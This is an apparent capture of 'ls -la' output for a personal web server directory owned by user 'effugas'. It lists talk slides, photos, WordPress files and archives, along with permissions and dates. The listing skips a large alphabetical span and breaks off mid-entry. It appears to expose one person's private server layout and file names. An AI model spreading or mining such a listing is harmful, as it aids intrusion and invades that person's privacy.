drwxr-xr-x 3 effugas effugas 512 Jul 13 2005 tmp drwxr-xr-x 6 effugas effugas 512 Jan 17 2006 txt2html-2.44 -rw-r--r-- 1 effugas effugas 117583 Jan 17 2006 txt2html-2.44.tar.gz -rw-r--r-- 1 effugas effugas 137992 Oct 21 2004 up.rle drwxr-xr-x 4 effugas effugas 512 Feb 19 2006 uptest -rw-r--r-- 1 effugas effugas 2072 Dec 20 2004 usage.png -rw-r--r-- 1 effugas effugas 37255 Dec 20 2004 usage_200412.html lrwxr-xr-x 1 effugas effugas 28 Apr 16 2003 van -> albums/2003-Apr14-Vancouver/ -rw-r--r-- 1 effugas effugas 28 Dec 20 2004 webalizer.hist -rw-r--r-- 1 effugas effugas 33721 Jun 5 2007 why_you_do_this.jpg -rwx------ 1 effugas effugas 743720 Jul 19 2003 winscp310.exe -rw-r--r-- 1 effugas effugas 30720 Jan 19 2005 wtf 
-rw-r--r-- 1 effugas effugas 4084 Apr 19 2005 wtf.foo -rw-r--r-- 1 effugas effugas 0 Nov 18 2002 ~. $ cd doxpara $ ls -la total 691032 drwxrwxrwx 124 effugas effugas 28672 Jul 18 06:22 . drwxr-xr-x 31 effugas effugas 2048 Sep 22 2008 .. -rw-r--r-- 1 effugas effugas 20480 Sep 5 2005 .Frontpage.swm -rw-r--r-- 1 effugas effugas 20480 Apr 19 2005 .Frontpage.swn -rw-r--r-- 1 effugas effugas 20480 Apr 19 2005 .Frontpage.swo -rw------- 1 effugas effugas 20480 Nov 21 2002 .Frontpage.swp -rw------- 1 effugas effugas 12288 Jun 22 2003 .Sidebar.swp -rw-r--r-- 1 effugas effugas 12288 Dec 24 2005 .hikids.html.swp -rwxrwxrwx 1 effugas effugas 1056 Oct 21 2008 .htaccess -rw------- 1 effugas effugas 12288 Feb 2 2006 .obvious.html.swp -rw-r--r-- 1 effugas effugas 5482570 Aug 7 2006 08-07-06_Hackers.mp3 -rw-r--r-- 1 effugas effugas 171 Jan 3 2005 404.php -rwxr--r-- 1 effugas effugas 1779714 Jan 7 2003 777Bitches.mp3 -rw-r--r-- 1 effugas effugas 36848 Feb 11 2001 Acceptance_camoback.jpg -rw-r--r-- 1 effugas effugas 78 Nov 14 2002 Addition.html -rw-r--r-- 1 effugas effugas 192991 Nov 17 2002 Advanced_OpenSSH.pdf -rw-r--r-- 1 effugas effugas 34691 Feb 11 2001 Anger_camoback.jpg -rwxr-xr-x 1 effugas effugas 169984 Mar 5 2003 Applied_Black_Ops_BHW_2003.ppt -rw-r--r-- 1 effugas effugas 301 Feb 11 2001 Arrow_DownLeft.gif -rw-r--r-- 1 effugas effugas 299 Feb 11 2001 Arrow_DownRight.gif -rw-r--r-- 1 effugas effugas 303 Feb 11 2001 Arrow_UpLeft.gif -rw-r--r-- 1 effugas effugas 305 Feb 11 2001 Arrow_UpRight.gif -rw-r--r-- 1 effugas effugas 391680 Apr 17 2003 BabelNet-1_11.doc -rw-r--r-- 1 effugas effugas 36608 Feb 11 2001 Bargaining_camoback.jpg -rw-r--r-- 1 effugas effugas 803840 Nov 15 2002 Black_Ops_Asia.ppt -rw-r--r-- 1 effugas effugas 345088 Jul 29 2004 Black_Ops_DNS_BH.ppt -rw-r--r-- 1 effugas effugas 310272 Nov 15 2002 Black_Ops_DefconX.ppt -rw-r--r-- 1 effugas effugas 1302528 Nov 18 2002 Black_Ops_Hivercon.ppt -rw-r--r-- 1 effugas effugas 1275904 Dec 24 2002 
Black_Ops_Hivercon_Final.ppt -rw-r--r-- 1 effugas effugas 8910773 Nov 14 2002 Black_Ops_Of_TCPIP2.pdf -rw-r--r-- 1 effugas effugas 458752 Aug 1 2005 Black_Ops_Of_TCPIP_2005.ppt -rw-r--r-- 1 effugas effugas 20255 Aug 14 2005 CHANGELOG.txt -rw-r--r-- 1 effugas effugas 21038 Feb 11 2001 Caere_General_Privacy_Protection_Fault.gif -rw-r--r-- 1 effugas effugas 21807 Feb 11 2001 Caere_Illegal_Operation.gif -rw-r--r-- 1 effugas effugas 36644 Feb 11 2001 Case_Study_camoback.jpg -rw-r--r-- 1 effugas effugas 36319 Feb 11 2001 Conclusion_camoback.jpg -rw-r--r-- 1 effugas effugas 176550 Nov 4 2008 CssFilter_1.0.zip -rwxr-xr-x 1 effugas effugas 2526208 Aug 3 2007 DMK_BO2K7_Web.ppt -rwxrwxrwx 1 effugas effugas 3480064 Aug 15 2008 DMK_BO2K8.ppt -rwxrwxrwx 1 effugas effugas 2673664 Feb 20 08:52 DMK_BO2K8_BHFed.ppt -rwxr-xr-x 1 effugas effugas 2143744 Jan 20 11:35 DMK_BO2K8_CCC.ppt lrwxr-xr-x 1 effugas effugas 17 Feb 20 09:13 DMK_Neut_Toor.ppt -> DMK_Neut_toor.ppt -rwxrwxrwx 1 effugas effugas 3241984 Jul 28 2008 DMK_Neut_toor.ppt -rw-r--r-- 1 effugas effugas 2270768 Dec 25 2004 DSC01568.JPG -rwxr-xr-x 1 effugas effugas 53139 Feb 16 2006 DanK_VBFeb06.pdf -rw-r--r-- 1 effugas effugas 37553 Nov 13 2002 Dan_Kaminsky_Resume.pdf -rw-r--r-- 1 effugas effugas 10801 Feb 11 2001 Dan_Pic.jpg -rw-r--r-- 1 effugas effugas 34934 Feb 11 2001 Denial_camoback.jpg -rw-r--r-- 1 effugas effugas 36755 Feb 11 2001 Depression_camoback.jpg drwxr-xr-x 4 effugas effugas 512 Aug 19 2008 Diff -rw-r--r-- 1 effugas effugas 11028 Apr 18 2008 Diff.php -rw-r--r-- 1 effugas effugas 29836 Feb 11 2001 DoxSTAR_Logo.jpg -rw-r--r-- 1 effugas effugas 31977 Feb 11 2001 DoxSTAR_New_Logo.jpg drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 Engine -rw-r--r-- 1 effugas effugas 51619 Sep 23 2005 Frontpage -rw-r--r-- 1 effugas effugas 40411 Apr 12 2005 Frontpage_backup -rw-r--r-- 1 effugas effugas 26280 Nov 14 2002 Frontpage_old -rw-r--r-- 1 effugas effugas 15364 Dec 24 2002 Frontpage_orig -rw-r--r-- 1 effugas effugas 1016 Nov 14 
2002 Frontpage~ -rw-r--r-- 1 effugas effugas 4099 Mar 3 2008 GoogleSpell.php -rw-r--r-- 1 effugas effugas 959731 Sep 15 2003 IMGP1778.JPG -rw-r--r-- 1 effugas effugas 1001186 Sep 26 2003 IMGP1807.JPG -rw-r--r-- 1 effugas effugas 663074 Jul 22 2004 IMGP2357.JPG -rw-r--r-- 1 effugas effugas 658676 Jul 22 2004 IMGP2358.JPG -rw-r--r-- 1 effugas effugas 657209 Jul 22 2004 IMGP2360.JPG -rw-r--r-- 1 effugas effugas 10280 Apr 22 2005 INSTALL.txt -rw-r--r-- 1 effugas effugas 37027 Feb 11 2001 Introduction_camoback.jpg -rw-r--r-- 1 effugas effugas 11877 Jan 17 2008 JSON.php -rw-r--r-- 1 effugas effugas 18019 Sep 15 2004 LICENSE.txt -rw-r--r-- 1 effugas effugas 237080 Sep 25 2003 Library.array -rw-r--r-- 1 effugas effugas 5465 Jan 17 2008 Logger.php -rw-r--r-- 1 effugas effugas 1428 Sep 15 2004 MAINTAINERS.txt -rw-r--r-- 1 effugas effugas 1125 Mar 2 2008 MIT-LICENSE -rw-r--r-- 1 effugas effugas 1900 Jan 17 2008 PSpell.php -rw-r--r-- 1 effugas effugas 2810 Jan 17 2008 PSpellShell.php -rw-r--r-- 1 effugas effugas 2428600 Nov 14 2002 Publ.2000.5.pdf -rw-r--r-- 1 effugas effugas 27914818 Nov 14 2002 Publ.2002.3.pdf drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 Renderer -rw-r--r-- 1 effugas effugas 6782 Apr 18 2008 Renderer.php -rw-r--r-- 1 effugas effugas 253440 Jul 30 2003 SBO.ppt -rwxr-xr-x 1 effugas effugas 302592 Oct 1 2003 SBO_Fed.ppt -rw-r--r-- 1 effugas effugas 461312 Sep 19 2003 SBO_Fed_Prerelease.ppt -rw-r--r-- 1 effugas effugas 634880 Nov 12 2003 SBO_Hiver.ppt -rw-r--r-- 1 effugas effugas 175847 Mar 26 2007 SharkReefScaredPic.jpg -rw-r--r-- 1 effugas effugas 423577 Mar 26 2007 SharkReefVegasPic.jpg -rw-r--r-- 1 effugas effugas 2305 Jul 13 2005 Sidebar -rw-r--r-- 1 effugas effugas 0 Dec 29 2004 Sidebar~ -rw-r--r-- 1 effugas effugas 29566 Feb 11 2001 Silc2.jpg -rw-r--r-- 1 effugas effugas 36390 Feb 11 2001 Sociology_camoback.jpg -rw-r--r-- 1 effugas effugas 1486 Feb 4 2008 SpellChecker.php -rwxrwxrwx 1 effugas effugas 206336 Mar 9 16:45 Staring Into The Abyss.doc 
-rwxrwxrwx 1 effugas effugas 204187 Mar 9 16:45 Staring Into The Abyss.pdf -rw-r--r-- 1 effugas effugas 79 Nov 14 2002 StringBuf.html drwxr-xr-x 3 effugas effugas 512 Jul 15 2008 Text -rw-r--r-- 1 effugas effugas 2633059 Sep 7 2006 Title_01.txt.png -rw-r--r-- 1 effugas effugas 951434 Jun 10 2002 Unwind.mov -rw-r--r-- 1 effugas effugas 2622 Nov 14 2002 ] -rw-r--r-- 1 effugas effugas 84604 Feb 11 2001 a_DoxSTAR_Logo.jpg -rw-r--r-- 1 effugas effugas 2943 Jun 27 2008 about.htm -rw-r--r-- 1 effugas effugas 2059 Feb 25 2008 about.js drwxr-xr-x 2 effugas effugas 512 Mar 9 12:26 abyss -rw-r--r-- 1 effugas effugas 37527 Nov 14 2002 act.html -rw-r--r-- 1 effugas effugas 157 Jul 1 2001 adddrop.gif -rw-r--r-- 1 effugas effugas 139 Jul 1 2001 addext.gif -rw-r--r-- 1 effugas effugas 1184 Jul 1 2001 addfull.gif -rw-r--r-- 1 effugas effugas 262 Jul 1 2001 addgo.gif -rw-r--r-- 1 effugas effugas 228 Jul 1 2001 addleft.gif -rw-r--r-- 1 effugas effugas 216 Jul 1 2001 addlinks.gif -rw-r--r-- 1 effugas effugas 562 Jul 1 2001 addmidd.gif -rw-r--r-- 1 effugas effugas 401 Jul 1 2001 addright.gif -rw-r--r-- 1 effugas effugas 91 Jul 1 2001 addspace.gif -rw-r--r-- 1 effugas effugas 18030 Jul 8 2008 admin-ajax.php -rw-r--r-- 1 effugas effugas 571 Feb 29 2008 admin-footer.php -rw-r--r-- 1 effugas effugas 182 Mar 21 2008 admin-functions.php -rw-r--r-- 1 effugas effugas 6447 Jul 3 2008 admin-header.php -rw-r--r-- 1 effugas effugas 432 Jul 11 2008 admin-post.php -rw-r--r-- 1 effugas effugas 845 Apr 14 2008 admin.php drwxr-xr-x 5 effugas effugas 512 Aug 19 2008 advanced -rw-r--r-- 1 effugas effugas 242613 Feb 2 2004 agenda.pdf drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 akismet -rw-r--r-- 1 effugas effugas 2777 Aug 23 2006 akismet.gif -rw-r--r-- 1 effugas effugas 33730 Jul 1 2008 akismet.php -rw-r--r-- 1 effugas effugas 818 Jan 17 2008 alert.gif -rw-r--r-- 1 effugas effugas 571 Jan 9 2008 align-center.png -rw-r--r-- 1 effugas effugas 587 Jan 9 2008 align-left.png -rw-r--r-- 1 effugas effugas 453 
Jan 9 2008 align-none.png -rw-r--r-- 1 effugas effugas 556 Jan 9 2008 align-right.png -rw-r--r-- 1 effugas effugas 1126 Jun 27 2008 anchor.htm -rw-r--r-- 1 effugas effugas 1029 Mar 25 2008 anchor.js drwxr-xr-x 2 effugas effugas 1536 Sep 14 2003 angel -rw-r--r-- 1 effugas effugas 0 Apr 26 2005 ani -rw-r--r-- 1 effugas effugas 91140 Feb 20 2005 ani.jpg lrwxr-xr-x 1 effugas effugas 5 Jul 30 2003 apps -> apps2 drwxr-xr-x 25 effugas effugas 512 Aug 15 2004 apps2 -rw-r--r-- 1 effugas effugas 1561824 Aug 20 2006 ar32_color_partial.png -rw-r--r-- 1 effugas effugas 2436 Feb 20 2008 archive.php -rw-r--r-- 1 effugas effugas 3066 Feb 28 2008 archive.png -rw-r--r-- 1 effugas effugas 352 Nov 18 2006 archives.php -rw-r--r-- 1 effugas effugas 8502243 Jun 16 2005 arm1.zip -rwxr-xr-x 1 effugas effugas 91136 Nov 14 2002 ass10.txt -rw-r--r-- 1 effugas effugas 1416 Jun 24 2008 async-upload.php -rw-r--r-- 1 effugas effugas 175 Feb 3 2006 at5.html -rw-r--r-- 1 effugas effugas 10928 Jun 20 2008 atomlib.php -rw-r--r-- 1 effugas effugas 430 Dec 24 2005 attack.html -rw-r--r-- 1 effugas effugas 180 Dec 24 2005 attack2.html -rw-r--r-- 1 effugas effugas 200604 Mar 24 2003 au8820.o -rw-r--r-- 1 effugas effugas 146 Jul 3 2008 audio.gif -rw-r--r-- 1 effugas effugas 4671 Dec 13 2005 audio.jpg -rw-r--r-- 1 effugas effugas 2647 Feb 28 2008 audio.png -rw-r--r-- 1 effugas effugas 36130 Apr 24 2007 audiodot.jpg -rw-r--r-- 1 effugas effugas 14171 Jun 20 2008 author-template.php drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 autosave -rw-r--r-- 1 effugas effugas 8131 Jun 23 2008 autosave.js -rw-r--r-- 1 effugas effugas 8048 Jan 23 2006 av2.txt -rwxr-xr-x 1 effugas effugas 10600 Jan 25 2006 av4.html -rwx------ 1 effugas effugas 10381 Jan 25 2006 av4.txt -rw-r--r-- 1 effugas effugas 5661 Jan 22 2006 av_pre.html -rw-r--r-- 1 effugas effugas 5502 Jan 22 2006 av_pre.txt -rw-r--r-- 1 effugas effugas 47957 Dec 10 2004 avaya.js -rw-r--r-- 1 effugas effugas 59756 Sep 23 2001 awpladin.jpg -rw-r--r-- 1 effugas effugas 
9043618 Apr 11 2005 b-ball-e-mail.mov -rw-r--r-- 1 effugas effugas 20403 Sep 11 2005 b151_alpha.tgz -rwxrwxrwx 1 effugas effugas 90306 Feb 11 15:20 badidea.jpg -rwxrwxrwx 1 effugas effugas 69977 Feb 11 15:20 badidea.png drwxr-xr-x 2 effugas effugas 10240 Dec 21 2006 bait2 -rw-r--r-- 1 effugas effugas 36613 Oct 29 2006 bam.jpg -rw-r--r-- 1 effugas effugas 1275 May 28 2004 base64.tgz -rw-r--r-- 1 effugas effugas 14760218 Apr 28 2005 basic_opte.dump -rw-r--r-- 1 effugas effugas 3512300 Apr 28 2005 basic_opte.zip -rw-r--r-- 1 effugas effugas 34713 Oct 6 2003 bathroom1.jpg -rw-r--r-- 1 effugas effugas 30767 Oct 6 2003 bathroom2.jpg -rw-r--r-- 1 effugas effugas 37078 Oct 6 2003 bathroom3.jpg -rw-r--r-- 1 effugas effugas 36704 Sep 7 2001 bboym.jpg -rwxr-xr-x 1 effugas effugas 64 Feb 2 2006 bgat.html -rw-r--r-- 1 effugas effugas 2668661 Sep 20 2003 bigtrace_foo.txt.gz -rw-r--r-- 1 effugas effugas 512200 Sep 20 2003 bigtrace_ordered.txt.gz -rw-r--r-- 1 effugas effugas 2456 Jan 17 1999 bjt.gif -rw-r--r-- 1 effugas effugas 3896 Mar 11 2001 bjt.jpg -rw-r--r-- 1 effugas effugas 7480 Jul 1 2004 black_ops_of_dns.txt -rw-r--r-- 1 effugas effugas 395 Jan 17 2008 blank.css -rw-r--r-- 1 effugas effugas 43 May 4 2008 blank.gif -rw-r--r-- 1 effugas effugas 204 Jan 6 2008 blank.htm -rw-r--r-- 1 effugas effugas 36963 Apr 16 2008 blogger.php -rw-r--r-- 1 effugas effugas 6264 Feb 29 2008 blogware.php -rwxr-xr-x 1 effugas effugas 3145 Sep 5 2007 blue1.png -rwxr-xr-x 1 effugas effugas 15962 Aug 15 2005 blue_double_cross.swf -rw-r--r-- 1 effugas effugas 1021215 Jun 21 2004 bo2004.pdf -rw-r--r-- 1 effugas effugas 483840 Jun 13 2004 bo2004.ppt -rw-r--r-- 1 effugas effugas 4300 Feb 13 2005 boe2.html -rwxr-xr-x 1 effugas effugas 810 Feb 5 2005 boeing.html -rw-r--r-- 1 effugas effugas 7090 Feb 5 2005 boeing.js -rw-r--r-- 1 effugas effugas 8948 Jun 24 2008 bookmark-template.php -rw-r--r-- 1 effugas effugas 4818 Apr 15 2008 bookmark.php -rw-r--r-- 1 effugas effugas 409 Nov 14 2002 bottom.html 
-rw-r--r-- 1 effugas effugas 365 Nov 14 2002 bottom_ie.html -rw-r--r-- 1 effugas effugas 2142026 Dec 17 2006 bouncy.avi -rw-r--r-- 1 effugas effugas 4398 Aug 27 2005 browse-happy.gif -rw-r--r-- 1 effugas effugas 3473 Feb 27 2008 btt.php -rw-r--r-- 1 effugas effugas 395 Mar 22 2008 bubble_bg.gif -rw-r--r-- 1 effugas effugas 4770 Mar 2 2008 builder.js -rw-r--r-- 1 effugas effugas 280 Jan 17 2008 button.gif -rw-r--r-- 1 effugas effugas 989 Jan 31 2008 buttons.gif -rw-r--r-- 1 effugas effugas 3274 Jan 17 2008 buttons.png -rwxr-xr-x 1 effugas effugas 559 Mar 23 2003 bwmon.sh -rw-r--r-- 1 effugas effugas 11872 May 25 2008 cache.php -rw-r--r-- 1 effugas effugas 488058 Dec 1 2006 cacm_kaminsky.pdf -rw-r--r-- 1 effugas effugas 71 Nov 14 2002 cal.html -rw-r--r-- 1 effugas effugas 1832402 Aug 30 2001 cal_rasterbation.jpg -rw-r--r-- 1 effugas effugas 129974 Aug 30 2001 cal_rasterbation_small.jpg -rwxr--r-- 1 effugas effugas 1106567 Jan 1 2003 call.wm_ -rw-r--r-- 1 effugas effugas 9744 May 25 2008 canonical.php -rw-r--r-- 1 effugas effugas 12732 Apr 16 2008 capabilities.php -rw-r--r-- 1 effugas effugas 146988 May 15 2007 carpenter.jpg -rw-r--r-- 1 effugas effugas 556 Oct 31 2007 cat.js -rw-r--r-- 1 effugas effugas 658 Mar 2 2008 categories.js -rw-r--r-- 1 effugas effugas 5473 Jun 13 2008 categories.php -rw-r--r-- 1 effugas effugas 16490 Jul 8 2008 category-template.php -rw-r--r-- 1 effugas effugas 11341 Jun 15 2008 category.php -rw-r--r-- 1 effugas effugas 36340 Jun 29 2005 caution.gif -rw-r--r-- 1 effugas effugas 362496 Sep 30 2005 cc.doc -rw-r--r-- 1 effugas effugas 2812509 Feb 6 2006 cdcygssh.cab -rw-r--r-- 1 effugas effugas 25 Feb 6 2006 cdl.html -rw-r--r-- 1 effugas effugas 41 Jun 1 02:21 cert.htm -rw-r--r-- 1 effugas effugas 0 Jun 1 02:21 cert.html -rw-r--r-- 1 effugas effugas 309643 Jan 22 2002 ch12.pdf -rw-r--r-- 1 effugas effugas 469968 Jan 22 2002 ch13.pdf -rw-r--r-- 1 effugas effugas 2398 Jun 27 2008 charmap.htm -rw-r--r-- 1 effugas effugas 14515 Feb 21 2008 
charmap.js -rwxr-xr-x 1 effugas effugas 95232 Sep 3 2006 chkreg.exe -rw-r--r-- 1 effugas effugas 28130 Jun 14 2008 class-IXR.php -rw-r--r-- 1 effugas effugas 5154 Mar 11 2008 class-ftp-pure.php -rw-r--r-- 1 effugas effugas 8223 Mar 11 2008 class-ftp-sockets.php -rw-r--r-- 1 effugas effugas 25912 Mar 16 2008 class-ftp.php -rw-r--r-- 1 effugas effugas 243102 Mar 15 2008 class-pclzip.php -rw-r--r-- 1 effugas effugas 6807 Jun 14 2008 class-phpass.php -rw-r--r-- 1 effugas effugas 44998 Jun 14 2008 class-phpmailer.php -rw-r--r-- 1 effugas effugas 20667 Jun 14 2008 class-pop3.php -rw-r--r-- 1 effugas effugas 33419 Jun 24 2008 class-smtp.php -rw-r--r-- 1 effugas effugas 37889 Jun 14 2008 class-snoopy.php -rw-r--r-- 1 effugas effugas 5307 Jul 3 2008 class-wp-filesystem-base.php -rw-r--r-- 1 effugas effugas 6558 May 30 2008 class-wp-filesystem-direct.php -rw-r--r-- 1 effugas effugas 10411 May 29 2008 class-wp-filesystem-ftpext.php -rw-r--r-- 1 effugas effugas 7820 May 30 2008 class-wp-filesystem-ftpsockets.php -rw-r--r-- 1 effugas effugas 5480 May 20 2008 class.wp-dependencies.php -rw-r--r-- 1 effugas effugas 2673 Jul 9 2008 class.wp-scripts.php -rw-r--r-- 1 effugas effugas 2369 Jul 9 2008 class.wp-styles.php drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 classes -rw-r--r-- 1 effugas effugas 24824 Jul 6 2008 classes.php drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 classic -rw-r--r-- 1 effugas effugas 4082 Oct 26 2004 classy.cpp -rw-r--r-- 1 effugas effugas 151 Feb 11 2001 clearbar.gif drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 clearlooks2 -rw-r--r-- 1 effugas effugas 43 Feb 11 2001 clearpixel.gif -rw-r--r-- 1 effugas effugas 69121 Sep 23 2002 cleartype.jpg -rw-r--r-- 1 effugas effugas 37749 Nov 14 2002 cleartype.png -rw-r--r-- 1 effugas effugas 289792 Apr 16 2006 cmd.exe -rw-r--r-- 1 effugas effugas 4107 Jul 20 2004 cnet.xml drwxrwxrwx 2 effugas effugas 512 Oct 17 2005 code -rw-r--r-- 1 effugas effugas 2133 Feb 28 2008 code.png drwxr-xr-x 2 effugas effugas 512 Dec 19 2002 
collab drwx------ 2 effugas effugas 1024 Jul 15 2003 collection -rw-r--r-- 1 effugas effugas 2875 Jun 27 2008 color_picker.htm -rw-r--r-- 1 effugas effugas 11017 Jun 4 2008 color_picker.js -rwxr-xr-x 1 effugas effugas 907 Sep 5 2007 colorcode.css -rw-r--r-- 1 effugas effugas 3189 Jan 17 2008 colorpicker.jpg -rw-r--r-- 1 effugas effugas 29114 Feb 29 2008 colorpicker.js -rw-r--r-- 1 effugas effugas 116 Mar 22 2008 colors-classic-rtl.css -rw-r--r-- 1 effugas effugas 14048 Jul 10 2008 colors-classic.css -rw-r--r-- 1 effugas effugas 116 Mar 19 2008 colors-fresh-rtl.css -rw-r--r-- 1 effugas effugas 13843 Jul 10 2008 colors-fresh.css -rw-r--r-- 1 effugas effugas 158 Feb 10 2008 comment-grey-bubble.png -rw-r--r-- 1 effugas effugas 72 Dec 22 2007 comment-pill.gif -rw-r--r-- 1 effugas effugas 1100 Mar 11 2008 comment-stalk-classic.gif -rw-r--r-- 1 effugas effugas 1067 Mar 11 2008 comment-stalk-fresh.gif -rw-r--r-- 1 effugas effugas 1064 Mar 19 2008 comment-stalk-rtl.gif -rw-r--r-- 1 effugas effugas 23887 Jun 22 2008 comment-template.php -rw-r--r-- 1 effugas effugas 897 Mar 26 2008 comment.js -rw-r--r-- 1 effugas effugas 3384 Apr 22 2008 comment.php -rw-r--r-- 1 effugas effugas 5062 Mar 21 2008 comments-popup.php -rw-r--r-- 1 effugas effugas 3495 Mar 17 2008 comments.php -rw-r--r-- 1 effugas effugas 1286 Mar 18 2008 common.js -rw-r--r-- 1 effugas effugas 2693 Mar 3 2008 compat.php -rw-r--r-- 1 effugas effugas 637 Jan 17 2008 config.php -rw-r--r-- 1 effugas effugas 915 Jan 17 2008 confirm.gif -rwxr-xr-x 1 effugas effugas 4940 Sep 23 2005 confoo.pl -rw-r--r-- 1 effugas effugas 314 Jan 31 2008 content.css -rw-r--r-- 1 effugas effugas 34927 Mar 2 2008 controls.js -rw-r--r-- 1 effugas effugas 9215 Jul 22 2001 cornell.jpg -rw-r--r-- 1 effugas effugas 911 Jan 17 2008 corners.gif -rw-r--r-- 1 effugas effugas 161371 Sep 22 2003 county2.sql -rw-r--r-- 1 effugas effugas 7119 Aug 23 2005 cred.zip -rw-r--r-- 1 effugas effugas 3097 Nov 14 2002 crit.txt -rw-r--r-- 1 effugas effugas 5099 Aug 
29 2007 cron.php drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 crop -rw-r--r-- 1 effugas effugas 2950 Mar 2 2008 cropper.css -rw-r--r-- 1 effugas effugas 16485 May 4 2007 cropper.js drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 crystal drwxr-xr-x 2 effugas effugas 1024 Jul 15 2008 css -rw-r--r-- 1 effugas effugas 533 Feb 21 2008 css.png -rw-r--r-- 1 effugas effugas 968 Mar 2 2008 custom-fields.js -rw-r--r-- 1 effugas effugas 11684 May 27 2008 custom-header.php -rw-r--r-- 1 effugas effugas 25846 Feb 11 2001 dan1.jpg -rw-r--r-- 1 effugas effugas 30054 Feb 11 2001 dan2.jpg -rw-r--r-- 1 effugas effugas 59055 Sep 15 2003 dan_and_sally.jpg -rw-r--r-- 1 effugas effugas 723975 Jun 28 2004 dan_at_l1.jpg -rw-r--r-- 1 effugas effugas 842526 Jun 28 2004 dan_at_l1_2.jpg -rw-r--r-- 1 effugas effugas 37749 Aug 10 2003 dan_sarah.jpg -rwxrwxrwx 1 effugas effugas 39961 Jul 19 2008 danjaybeale.png -rw-r--r-- 1 effugas effugas 1435 Jul 13 2008 dashboard-rtl.css -rw-r--r-- 1 effugas effugas 4793 Mar 21 2008 dashboard.css -rw-r--r-- 1 effugas effugas 22311 Jun 20 2008 dashboard.php drwxr-sr-x 2 effugas effugas 512 Oct 17 2005 database -rw-r--r-- 1 effugas effugas 111 Mar 14 2008 date-button.gif -rwxr-xr-x 1 effugas effugas 2420 Nov 14 2002 david.txt -rw-r--r-- 1 effugas effugas 2105488 Jan 29 2007 ddop-0.1.zip -rw-r--r-- 1 effugas effugas 2105664 Jan 31 2007 ddop-0.2.zip -rw-r--r-- 1 effugas effugas 2105999 Feb 3 2007 ddop-0.3.zip drwxr-xr-x 3 effugas effugas 512 Jul 15 2008 default -rw-r--r-- 1 effugas effugas 6896 Jun 29 2008 default-filters.php -rw-r--r-- 1 effugas effugas 479 Feb 21 2008 default.png -rw-r--r-- 1 effugas effugas 1638 Jun 9 2008 delete.png -rwxr-xr-x 1 effugas effugas 751304 Mar 26 2003 demo9.exe -rw-r--r-- 1 effugas effugas 37548 Jul 8 2008 deprecated.php drwxr-xr-x 2 effugas effugas 512 Aug 7 2003 dev -rw-r--r-- 1 effugas effugas 5421 Feb 21 2008 dialog.css -rw-r--r-- 1 effugas effugas 422438 Jan 26 2006 diff.html -rw-r--r-- 1 effugas effugas 408043 May 15 11:32 
diffiegrandma.jpg -rwx------ 1 effugas effugas 140 Jan 22 2007 direct.html drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 directionality -rw-r--r-- 1 effugas effugas 534851 Jan 16 2006 dll_func0.PNG -rw-r--r-- 1 effugas effugas 20140 Oct 22 2001 dmk.jpg -rwxr-xr-x 1 effugas effugas 263415 Oct 3 2001 dmk1_full.jpg -rwxr-xr-x 1 effugas effugas 346549 Oct 3 2001 dmk2_full.jpg -rw-r--r-- 1 effugas effugas 13224448 Jun 27 2007 dmk_audioviz.ppt -rw-r--r-- 1 effugas effugas 11904275 Aug 9 2006 dmk_bbc_raul.mp3 -rw-r--r-- 1 effugas effugas 9568256 Aug 3 2006 dmk_blackops2006.ppt -rw-r--r-- 1 effugas effugas 8652746 Nov 28 2006 dmk_bo2006_toor.pdf -rw-r--r-- 1 effugas effugas 7104740 Aug 8 2006 dmk_bo2k6.pdf -rw-r--r-- 1 effugas effugas 10059264 Apr 28 2007 dmk_shmoo2007.ppt -rw-r--r-- 1 effugas effugas 94945 Aug 10 2004 dn_atmouse.jpg -rw-r--r-- 1 effugas effugas 140292 Aug 10 2004 dn_atpier.jpg drwxr-xr-x 2 effugas effugas 512 Dec 20 2004 dna drwxrwxrwx 3 effugas effugas 512 Jun 21 2004 dns -rw-r--r-- 1 effugas effugas 106496 Jun 29 2004 dns.log drwxr-xr-x 4 effugas effugas 512 Aug 1 2004 dns_bh -rw-r--r-- 1 effugas effugas 507548 Nov 7 2004 dns_coords.zip drwxr-xr-x 2 effugas effugas 512 Sep 16 2004 dns_fast -rw-r--r-- 1 effugas effugas 82026 Jun 29 2004 dns_scan_1.jpg -rw-r--r-- 1 effugas effugas 74457 Jun 29 2004 dns_scan_2.jpg drwxr-xr-x 3 effugas effugas 512 Sep 30 2004 dns_tc -rw-r--r-- 1 effugas effugas 1116160 Jun 21 2004 dnsstuff.tar -rw-r--r-- 1 effugas effugas 1535 Feb 21 2008 doc.png -rw-r--r-- 1 effugas effugas 2305 Feb 28 2008 document.png drwxr-xr-x 2 effugas effugas 512 Jul 31 2007 dolphin -rw-r--r-- 1 effugas effugas 2173 Sep 3 2004 dormant-0.1.tar.gz -rw-r--r-- 1 effugas effugas 2393 Sep 3 2004 dormant-0.11.tar.gz -rw-r--r-- 1 effugas effugas 23211 Apr 14 2008 dotclear.php -rwxr-xr-x 1 effugas effugas 399 Feb 1 2006 downlevel.html -rw-r--r-- 1 effugas effugas 0 Jun 1 02:21 downloader.do?c=115814&d=dvp -rw-r--r-- 1 effugas effugas 5692 Feb 11 2001 
effugas effugas 155446 Jun 27 2008 tiny_mce.js -rw-r--r-- 1 effugas effugas 11690 Jul 11 2008 tiny_mce_config.php -rw-r--r-- 1 effugas effugas 1007 Jun 4 2008 tiny_mce_ext.js -rw-r--r-- 1 effugas effugas 6870 Jun 4 2008 tiny_mce_popup.js drwxr-xr-x 6 effugas effugas 512 Jul 15 2008 tinymce -rwxr-xr-x 1 effugas effugas 1333 Nov 15 2002 titlife.txt drwxr-xr-x 2 effugas effugas 512 May 2 2005 tmp -rw-r--r-- 1 effugas effugas 2107 May 14 2005 to_ani.txt -rw-r--r-- 1 effugas effugas 403484 Oct 18 2004 tod.zip -rw-r--r-- 1 effugas effugas 10557 Aug 11 2001 todo.xml -rw-r--r-- 1 effugas effugas 72 Mar 19 2008 toggle-arrow-rtl.gif -rw-r--r-- 1 effugas effugas 71 Jan 8 2008 toggle-arrow.gif -rw-r--r-- 1 effugas effugas 2894 Nov 14 2002 tommie.html -rw-r--r-- 1 effugas effugas 3226 Nov 14 2002 tommie2.html -rw-r--r-- 1 effugas effugas 260 